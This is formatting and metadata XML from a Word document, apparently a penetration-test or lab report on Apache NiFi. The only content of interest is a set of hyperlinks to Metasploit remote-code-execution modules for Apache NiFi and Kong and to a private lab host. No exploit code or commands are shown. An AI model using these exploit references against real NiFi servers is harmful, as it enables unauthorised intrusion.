      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="86FA9098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8D86CD18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A67EA878">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7380693C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="85EE7298">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C832D8D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2404F692">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="615B1AB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7914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4B6FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4520E06"/>
    <w:lvl w:ilvl="0" w:tplc="67B2AAD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C7CEBB50">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8D3C9A00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A17EE830">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="33C0BC5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="75C47EB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9CEECF5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B5344194">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4574E9B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CAE0CB7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51F217E8"/>
    <w:lvl w:ilvl="0" w:tplc="1694A9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6F4387"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C506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03F34F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF647974"/>
    <w:lvl w:ilvl="0" w:tplc="D4F2F1C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="74B01CD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FBA0B544">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="74CE720E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EC700DE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0400E8F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FA146BFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DB200104">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4ECA306C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1024205653">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1429349655">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="395056743">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1421371084">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1117991091">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2122987601">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1424762076">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="303394134">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1565799813">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="779496718">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1289050494">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="386563402">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1185900107">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="2006393143">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1519662352">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1238176836">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="980690184">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1474759581">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="895044412">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1396781423">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="462626170">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1928422150">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="321274994">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="164246210">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="208685966">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="766120252">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1972127543">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="932711463">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1114637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014C6"/>
    <w:rsid w:val="00033FCC"/>
    <w:rsid w:val="00044B7E"/>
    <w:rsid w:val="00061196"/>
    <w:rsid w:val="00066605"/>
    <w:rsid w:val="000678C3"/>
    <w:rsid w:val="0007028D"/>
    <w:rsid w:val="000840C8"/>
    <w:rsid w:val="000D2815"/>
    <w:rsid w:val="000E22D1"/>
    <w:rsid w:val="000F4A8F"/>
    <w:rsid w:val="00121486"/>
    <w:rsid w:val="00123DCA"/>
    <w:rsid w:val="001334A6"/>
    <w:rsid w:val="00146A0A"/>
    <w:rsid w:val="00161AAE"/>
    <w:rsid w:val="00163836"/>
    <w:rsid w:val="00165601"/>
    <w:rsid w:val="001C3FD0"/>
    <w:rsid w:val="001D2622"/>
    <w:rsid w:val="001F288C"/>
    <w:rsid w:val="001F4D68"/>
    <w:rsid w:val="001F5071"/>
    <w:rsid w:val="00210B19"/>
    <w:rsid w:val="00236359"/>
    <w:rsid w:val="002526E8"/>
    <w:rsid w:val="00264322"/>
    <w:rsid w:val="002B529D"/>
    <w:rsid w:val="002F632A"/>
    <w:rsid w:val="002F779F"/>
    <w:rsid w:val="00335060"/>
    <w:rsid w:val="003457E1"/>
    <w:rsid w:val="003678CA"/>
    <w:rsid w:val="00373608"/>
    <w:rsid w:val="003A22B1"/>
    <w:rsid w:val="003C1D22"/>
    <w:rsid w:val="00412D84"/>
    <w:rsid w:val="0045060D"/>
    <w:rsid w:val="0045771C"/>
    <w:rsid w:val="004915DA"/>
    <w:rsid w:val="00497A8C"/>
    <w:rsid w:val="004B7676"/>
    <w:rsid w:val="00510D8F"/>
    <w:rsid w:val="00513E5F"/>
    <w:rsid w:val="00525C6D"/>
    <w:rsid w:val="00542F3A"/>
    <w:rsid w:val="005520A6"/>
    <w:rsid w:val="005568C9"/>
    <w:rsid w:val="00561CC2"/>
    <w:rsid w:val="00584B92"/>
    <w:rsid w:val="005A23B0"/>
    <w:rsid w:val="005C0CB1"/>
    <w:rsid w:val="005C2CEB"/>
    <w:rsid w:val="005C6B58"/>
    <w:rsid w:val="005D0252"/>
    <w:rsid w:val="005E67CE"/>
    <w:rsid w:val="006253D6"/>
    <w:rsid w:val="0063180D"/>
    <w:rsid w:val="006501B4"/>
    <w:rsid w:val="006614E2"/>
    <w:rsid w:val="00665668"/>
    <w:rsid w:val="006956B2"/>
    <w:rsid w:val="006A5F39"/>
    <w:rsid w:val="006D0809"/>
    <w:rsid w:val="006D3C73"/>
    <w:rsid w:val="0070336B"/>
    <w:rsid w:val="0070351F"/>
    <w:rsid w:val="00707891"/>
    <w:rsid w:val="007117FA"/>
    <w:rsid w:val="0071459E"/>
    <w:rsid w:val="0071773C"/>
    <w:rsid w:val="007221D3"/>
    <w:rsid w:val="007356F4"/>
    <w:rsid w:val="00740D43"/>
    <w:rsid w:val="00741ED4"/>
    <w:rsid w:val="00782E20"/>
    <w:rsid w:val="00792B52"/>
    <w:rsid w:val="00797D4B"/>
    <w:rsid w:val="00797E47"/>
    <w:rsid w:val="007B4B13"/>
    <w:rsid w:val="00827E1E"/>
    <w:rsid w:val="00834DA1"/>
    <w:rsid w:val="008D3BD8"/>
    <w:rsid w:val="00914C98"/>
    <w:rsid w:val="00930EBB"/>
    <w:rsid w:val="00945A2F"/>
    <w:rsid w:val="00967ADE"/>
    <w:rsid w:val="0097575D"/>
    <w:rsid w:val="009A2789"/>
    <w:rsid w:val="009B4155"/>
    <w:rsid w:val="009C714D"/>
    <w:rsid w:val="009D41A8"/>
    <w:rsid w:val="00A2771F"/>
    <w:rsid w:val="00A343C2"/>
    <w:rsid w:val="00A563F8"/>
    <w:rsid w:val="00A56A4D"/>
    <w:rsid w:val="00A74A75"/>
    <w:rsid w:val="00A95C5E"/>
    <w:rsid w:val="00AF5827"/>
    <w:rsid w:val="00B0390B"/>
    <w:rsid w:val="00B164E1"/>
    <w:rsid w:val="00B468AC"/>
    <w:rsid w:val="00B534EB"/>
    <w:rsid w:val="00B85BEC"/>
    <w:rsid w:val="00B97B73"/>
    <w:rsid w:val="00BA0FF3"/>
    <w:rsid w:val="00BD4923"/>
    <w:rsid w:val="00BD6154"/>
    <w:rsid w:val="00C01F8B"/>
    <w:rsid w:val="00C10B10"/>
    <w:rsid w:val="00C31EB9"/>
    <w:rsid w:val="00C55D51"/>
    <w:rsid w:val="00C560EA"/>
    <w:rsid w:val="00C70AEB"/>
    <w:rsid w:val="00C70ED3"/>
    <w:rsid w:val="00CA2637"/>
    <w:rsid w:val="00CA464F"/>
    <w:rsid w:val="00CA70E3"/>
    <w:rsid w:val="00CE5256"/>
    <w:rsid w:val="00CF78EE"/>
    <w:rsid w:val="00D2185C"/>
    <w:rsid w:val="00D42557"/>
    <w:rsid w:val="00D513C1"/>
    <w:rsid w:val="00D51AEE"/>
    <w:rsid w:val="00D86EF9"/>
    <w:rsid w:val="00D907F9"/>
    <w:rsid w:val="00DA3E5E"/>
    <w:rsid w:val="00DB3C26"/>
    <w:rsid w:val="00DD48B7"/>
    <w:rsid w:val="00E025D2"/>
    <w:rsid w:val="00E2290A"/>
    <w:rsid w:val="00E3517A"/>
    <w:rsid w:val="00E459DB"/>
    <w:rsid w:val="00E5200A"/>
    <w:rsid w:val="00EB67E6"/>
    <w:rsid w:val="00ED09D5"/>
    <w:rsid w:val="00ED11F9"/>
    <w:rsid w:val="00EF43A8"/>
    <w:rsid w:val="00F14AD8"/>
    <w:rsid w:val="00F20F0C"/>
    <w:rsid w:val="00F36567"/>
    <w:rsid w:val="00F4497B"/>
    <w:rsid w:val="00F626D9"/>
    <w:rsid w:val="00F7289F"/>
    <w:rsid w:val="00F94FC9"/>
    <w:rsid w:val="00FC616F"/>
    <w:rsid w:val="00FD53B2"/>
    <w:rsid w:val="00FD73CF"/>
    <w:rsid w:val="00FF68E7"/>
    <w:rsid w:val="0180BCFD"/>
    <w:rsid w:val="143DCD2C"/>
    <w:rsid w:val="2BAFCCF9"/>
    <w:rsid w:val="2E045475"/>
    <w:rsid w:val="332BFF20"/>
    <w:rsid w:val="3382F8CE"/>
    <w:rsid w:val="3A004363"/>
    <w:rsid w:val="3EE847B1"/>
    <w:rsid w:val="421BDB7E"/>
    <w:rsid w:val="4BBF56A5"/>
    <w:rsid w:val="51AE92C3"/>
    <w:rsid w:val="54994BBD"/>
    <w:rsid w:val="586A6D0B"/>
    <w:rsid w:val="5C162613"/>
    <w:rsid w:val="5D8FDB31"/>
    <w:rsid w:val="5F433DE4"/>
    <w:rsid w:val="6400825E"/>
    <w:rsid w:val="6402161D"/>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D42557"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D42557"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D42557"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D42557"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D42557"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D42557"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00044B7E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00F94FC9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B468AC"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003457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756788">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1091505699">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2025476214">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="213255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labs.withsecure.com/tools/metasploit-modules-for-rce-in-apache-nifi-and-kong-api-gateway" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.203.225:80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cwe.mitre.org/data/definitions/250.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nifi.apache.org/securit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apid7.com/db/modules/exploit/multi/http/apache_nifi_processor_r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192.168.203.225:8080"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CED372D81F7F4E9B81EF5B28922A92" ma:contentTypeVersion="4" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="154d7ba3e5d22bacc7337f52069057f9">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="99f00f70-e37c-45fc-a58c-25b9fce86e97" xmlns:ns3="76dd32bb-4b56-4927-99ec-3ebca7c2e701" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="fe908fe1cca59746e614ea21accd0998" ns2:_="" ns3:_="">
    <xsd:import namespace="99f00f70-e37c-45fc-a58c-25b9fce86e97"/>
    <xsd:import namespace="76dd32bb-4b56-4927-99ec-3ebca7c2e7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00f70-e37c-45fc-a58c-25b9fce86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d32bb-4b56-4927-99ec-3ebca7c2e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7BB3CB-DB5D-4665-9F14-DA63C61B0C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00f70-e37c-45fc-a58c-25b9fce86e97"/>
    <ds:schemaRef ds:uri="76dd32bb-4b56-4927-99ec-3ebca7c2e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customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4975ADDB-894D-42C9-8625-30CC86AB8C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FE5D68-1416-48EF-AF7A-EF44697BAD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hedau</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-22T03:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-29T01:01:00Z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0x010100C9CED372D81F7F4E9B81EF5B28922A92</vt:lpwstr>
  </property>
</Properties>
</file>